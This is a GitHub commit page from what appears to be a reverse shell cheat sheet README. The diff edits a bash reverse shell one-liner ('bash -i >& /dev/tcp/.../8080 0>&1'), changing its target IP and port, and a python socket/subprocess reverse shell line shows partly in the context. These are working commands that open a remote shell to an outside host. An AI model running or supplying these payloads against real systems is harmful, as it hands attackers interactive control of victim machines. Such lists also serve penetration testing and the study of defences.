Skip to content

Commit

Permalink
bash reverse shell command error fix
Browse files Browse the repository at this point in the history
 bash reverse shell command error fix
  • Loading branch information
İsmail Taşdelen committed Mar 11, 2019
1 parent 8d9b5b2 commit 5eb104c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Expand Up @@ -25,7 +25,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
#### Bash :

```
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
```

#### Netcat :
Expand Down

0 comments on commit 5eb104c

Please sign in to comment.